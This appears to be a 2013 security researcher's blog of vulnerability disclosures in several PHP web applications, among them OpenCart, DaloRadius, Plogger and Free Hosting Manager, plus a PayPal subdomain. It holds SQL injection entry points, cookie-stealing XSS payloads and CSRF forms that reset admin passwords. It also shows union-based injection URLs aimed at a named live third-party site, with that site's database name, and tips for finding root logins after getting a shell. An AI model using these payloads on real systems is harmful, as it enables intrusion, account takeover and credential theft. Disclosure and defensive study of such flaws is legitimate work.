OpenCart Local Path Disclose - LPD

Posted by Saadi On Saturday 30 March 2013 3 comments
Hi ,  today OpenCart .
Just setup Opencart to give it a pen-test and here is initial results.

Oka Bug

OpenCart Disclose the Local Path Of server on many location , Some of them are . .

http://localhost/opencart/upload/catalog/controller/account/address.php

http://localhost/opencart/upload/catalog/controller/account/account.php

http://localhost/opencart/upload/catalog/controller/account/order.php . . .etc

Live Demo

OpenCart Own Domain

http://demo.opencart.com/catalog/controller/account/address.php

http://spotonsolutions.net/catalog/controller/account/address.php




How this issue comes And patching . . . . 

When you are including different php file in one file and declaration of some variable / function in first file and using that variable / function in that file you included second.Now if this second file access by anyone directly you will got some error like ...
Variable undeclared..
Class not found blah blah.

Like we have index.php with code

include('1.php');
include('2.php');

Code of 1.php

class a {
public :
$count=0;
}

Code of 2.php

$classs = new a();


Now as you see if you access 2.php directly you will got error

Class a not found.
Because class a is define in 1.php

But if you access index.php
it will work perfect as
their is class a in 1.php and then 2.php is using that class..

So this is how many times LPD occurs.

Patching . . . . 
Simplest patching
turn error reporting off .

Or

You can also do .htaccess
Order deny,allow
Deny from all


Or

You can do this
Just declare any variable in index.php or in that file you will going to include 1.php and 2.php
like

if (!defined("direct access")) {
define('
direct access
', true);
}


and then just add this on top of 1.php and 2.php

defined('
direct access
') or die("Access Denied.");

what it does simply main file declare a variable and the included files check if that variable is set or not..As you already set the value in main file it will run perfectly.
But if you direct access those files that are included in main file.then as they check if variable is set or not and in direct accessing the file will not have that variable set so it will go in die showing u access denied.

So this for today..

# Independent Pakistani Security Researcher

 


READ MORE

Concrete Latest Version 5.6.1.2 CSRF--Logout and Persistent XSS

Posted by Saadi On Tuesday 26 March 2013 3 comments
Hi , today concrete

Concrete is a famous Content management system.
For more
www.concrete5.org

So i was just pen-testing it a bit and initially just found that It is not using any security token to protect making
admin/users logout (CSRF).

http://localhost/concrete/index.php/login/logout/
In simple terms just by sending this link to any user which has valid session will going to logout.
Header:
GET http://localhost/concrete/index.php/login/logout/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: CONCRETE5=garsp3c29rflks37hk16jda510
Connection: keep-alive



oka XSS
I found XSS inside the admin panel but still every thing should be secure.
Bug

Concrete is not sanitizing the POST field user input of tags.
When you are making a post to publish on the blog their is an option to enter the TAG for the post.
So this POST filed is vulnerable to XSS.

Goto Write post inside admin panel-->then just enter any XSS vector in TAG filed and you will get results.
And it is store/persistent XSS.



So this is for today.

#independent Pakistani Security Researcher

READ MORE

Free Hosting Manager V 2.0.2 Multiple SQLi

Posted by Saadi On Saturday 23 March 2013 2 comments
Hi , for today Free hosting manager.Free hosting manager is a free script to install and run your hosting.
Its includes clients register their and then order hosting and blah blah..so the script is highly vulnerable plus if you successfully upload the shell or have server access you do symlink to get the root whm logins.

Free hosting manager store root logins in config.php
So if you shell it you should check config.php for root logins.

Exploit Links

http://www.exploit-db.com/exploits/24879

http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html

http://1337day.com/exploit/20555

Exploit Details
-------------------------------------------------------------------------

# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                        
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                            
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
                                                                                   
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
Its is vulnerable to SQLi on many file some of them are..

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php ---> SQLi on all POST Fields.

Proof Of Concept
In home.php
Calling a function auth() and what it is

if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {

$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET['do'] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")

Only using stripslahes which will not protect against doing sql injection attack.

#independent Pakistani Security Researcher
READ MORE

Bug Bounty Paypal -- No luck :)

Posted by Saadi On 2 comments
Hi , some days ago found a XSS bug in Paypal Services but was not eligible to get the bounty ,well no worries will try again :D . . .

It was subdomain of billmelater.com

Bug Can be used for like phishing attacks etc
domain: http://wwwb.search.billmelater.com

They are getting integer value from the GET Field and using it as time to redirect you on other pages..

Vuln Link  :
 http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert(document.cookie)</script>

 http://wwwb.search.billmelater.com/coupons/store/guess/?u='"--></style></script><script>alert("XSS by Saadat")</script>

ScreenShot




So this is for today  :)

#IndependentPakistaniSecurityResearcher

READ MORE

DaloRadius CSRF / XSS / SQL Injection

Posted by Saadi On Saturday 16 March 2013 2 comments
Hi , just browsing Sourceforge and see a script having more than 1 thousand downloads per week ,  so not bad to give it a pentest and found some stuff in it :)

Exploit Links

http://www.exploit-db.com/exploits/24849

http://1337day.com/exploit/20513

http://packetstormsecurity.com/files/120828/DaloRadius-CSRF-XSS-SQL-Injection.html

Exploit

-------------------------------------------------------------------------
# Software      : DaloRadius    SQLi / CSRF / XSS                                                                                                            
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home  : http://security-geeks.blogspot.com
# Date          : 15/3/13   
# Vendors  : http://www.daloradius.com/ 
# Download Link : http://sourceforge.net/projects/daloradius/   
                                                                                     
-------------------------------------------------------------------------
+---+[ CSRF Change Admin Password ]+---+

DaloRadius Is not Using Any Security Tokens To Protect Againts CRSF.It is vuln to CRSF on All Locations.
Some OF them..
Change Admin Password

<form action="daloradius/config-operators-edit.php" method="post">
        <input type="hidden" value="administrator" name="operator_username" />

<div class="tabber">

     <div class="tabbertab" title="Operator Info">

  <fieldset>
  
    <h302></h302>
    <br/>

                <label for='operator_password' class='form'></label>
                <input name='password' id='password'
    type='hidden'      value='radius1' tabindex=101 />
                <br/>

                <br/><br/>
                <hr><br/>

                <input type='submit' name='submit' value='Apply' class='button' />

Poc
Header
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/daloradius/config-operators-edit.php?operator_username=administrator
Cookie: PHPSESSID=5f528764d624db129645be2e9
Content-Type: application/x-www-form-urlencoded
Content-Length: 3540

Post Data:
operator_username=administrator&password=radius1&submit=Apply

+---+[ SQL Injection ]+---+

Their are multiple SQLI in the script some are..
http://localhost/daloradius/acct-ipaddress.php?orderBy=[SQLi]
http://localhost/daloradius/acct-ipaddress.php?ipaddress=[SQLi]
http://localhost/daloradius/acct-date.php?orderBy=[SQLi]
http://localhost/daloradius/acct-date.php?username=[SQLi] etc

Proof Of Concept
in acct-ipaddress.php

isset($_GET['orderBy']) ? $orderBy = $_GET['orderBy'] : $orderBy = "radacctid";
  isset($_GET['orderType']) ? $orderType = $_GET['orderType'] : $orderType = "asc";  


  isset($_GET['ipaddress']) ? $ipaddress = $_GET['ipaddress'] : $ipaddress = "";

  .
  .
  .
 $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, radacct.FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, radacct.AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE FramedIPAddress='$ipaddress';";


In acct-date.php
if ( (isset($_GET['username'])) && ($_GET['username']) ) {
    $username = $_GET['username'];



  $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, ".$configValues['CONFIG_DB_TBL_RADACCT'].".FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE AcctStartTime>'$startdate' and AcctStartTime<'$enddate' and UserName like '$username';";



+---+[ XSS ]+---+
http://localhost/daloradius/rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter=<script>alert(document.cookie);</script>
http://localhost/daloradius/mng-search.php?username=<script>alert(document.cookie);</script>

#Independent Pakistani Security Researcher
READ MORE

Web Cookbook SQL Injection / XSS

Posted by Saadi On Tuesday 12 March 2013 1 comments
Exploit Links: 

http://www.exploit-db.com/exploits/24742/

http://packetstormsecurity.com/files/120760/Web-Cookbook-SQL-Injection.html

http://1337day.com/exploit/20501

Exploit

# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=


#Independent Pakistani Security Researcher

Exploit Live Demo
kochen.joachim-gabel.de/showtext.php?mode=603' [Union Based Injection]

Database Name:
db394647325

http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,table_name,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--

 http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,database%28%29,4,5--
etc...
READ MORE

Nconf 1.3 SQL Injection / Cross Site Scripting Vulnerabilities

Posted by Saadi On Monday 4 March 2013 1 comments
Hi Today Nconf v1.3 ,Ahh script is highly insecure so just Reported Few of them..
 Exploit Links: 
http://1337day.com/exploit/20475 
http://packetstormsecurity.com/files/120628/Nconf-1.3-SQL-Injection-Cross-Site-Scripting.html

# Exploit Title: nconf handle_item.php,Modify_attr.php etc Multiple Sql injection
# Date: 2013/3/4
# Exploit Author: Saadat Ullah,saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Vendors: http://www.nconf.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Version: nconf 1.3
 # Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs.
Some OF them Are Blind Sqli In handle_item.php on
Id parameter handle_item.php?id=1' P0c $query2 .= ' AND id_item <> '.$_GET["id"];
 delete_attr.php POST DATA :
id=15'&name=&delete=yes&submit=Delete
Poc Id Via GEt FIELD $query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';

And id via Post Field $query = 'DELETE FROM ConfigAttrs WHERE id_attr='.$_POST["id"]; clone_host_write2db.php Again On id paramerter. Their are Many more...

A Simple Reflected XSS

http://localhost/nconf/handle_item.php?item=XSS Vector Poc $item_class = $_GET["item"]; . . echo without Sanitization echo ''.ucfirst($handle_action).' '.$item_class.'';
A LocalPath Disclose http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes Post Data: host_id=5372&highlight_service=5373&class=a  

#Independent Pakistani Security Researcher
READ MORE

Plogger Gallery RC 1 Multiple Vuln [SQLI-XSS-CRSF]

Posted by Saadi On Sunday 3 March 2013 1 comments
hi , 2 days back my friend need a cms on image gallery so after finding one i Pentest Script and Found highly Insecure. Complete Exploit Can be View Here. 1337day : http://1337day.com/exploit/20470 PacketStrome: http://packetstormsecurity.com/files/120619/PloggerGallery-1.0-RC1-CSRF-XSS-SQL-Injection.html P0c -------------------------------------------------------------------------
# Software : PloggerGallery Version 1.0 RC1
# Author : Saadat Ullah
# Date : 2/3/13
# Dork : Use Ur Mind
# Software Link : http://www.plogger.org/download/
-------------------------------------------------------------------------
+---+[ Feedback.php Sqli ]+---+

Injectable On entries_per_pag Parameter In Feedback.php

http://localhost/plogger/plog-admin/plog-feedback.php?entries_per_page=5'

p0c

if (isset($_REQUEST['entries_per_page'])) {
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
$_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.

// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);

+---+[ CSRF In Admin Panel ]+---+

Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel..

+---+[ XSS ]+---+

Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin.
And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector..

XSS
http://localhost/plogger/plog-admin/plog-feedback.php
Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF.


Uploading the File and enter name to any XSS Vector..

http://localhost/plogger/plog-admin/plog-upload.php

It Can Me Exploit IN Many Ways LIke
CSRF + SQLI inside Admin panel..which Is define above.

XSS In Edit Comment.CSRF + XSS

<html>
<head>
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-feedback.php" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Comment</div>
<p>
<label class="strong" accesskey="a" for="author">Author:</label><br />
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="e" for="email">Email:</label><br />
<input size="65" name="email" id="email" value="asdf@localhost.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="u" for="url">Website:</label><br />
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
</p>
<input type="hidden" name="pid" value="4" />
<input type="hidden" name="action" value="update-comment" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>


Another XSS
http://localhost/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit Caption To XSS Vector Inside Admin PAnel..
Again CSRF + XSS
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Image Properties</div>
<p>
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
</p>
<p>
<label class="strong" for="description">Description:</label><br />
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
</p>
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
<input type="hidden" name="pid" value="1" />
<input type="hidden" name="action" value="update-picture" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>


CSRF Admin Password Reset And XSS

plog-options.php

<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="localhost@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<td class="left"><label for="gallery_url"></label></td>
<td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>

--------------------------------------------------------
# Email - saadi_linux@rocketmail.com
# GreeTz 2 All Pakistani Security Researchers
# Home - http://security-geeks.blogspot.com
---------------------------------------------------------
READ MORE

Mybb Plugin PRO STAT [SQLI]

Posted by Saadi On Saturday 2 March 2013 3 comments
I was working on some mybb plugins and found some vulns in that..
So for now PRO STAT .

Vendors: http://prostats.wordpress.com

Pro stat is Well known Mybb plugin and vuln to sql injection Inside admin panel and Change viewer.
ITs not much exploitable but bcz u want admin logins but can be handy to dumping the db if u failed to shell it ;)

oka here

Goto Plugins ANd just inject num rows settings..
ITs vuln to most of the parameter inside settings.
LIke POST FIELD ps_num_rows etc.

Screen Shot
READ MORE

My Updates

Posted by Saadi On 1 comments
Sallam , I was thinking to make an blog for my security findings and updates so, All my security updates gona come here.. Cheers Saadi
READ MORE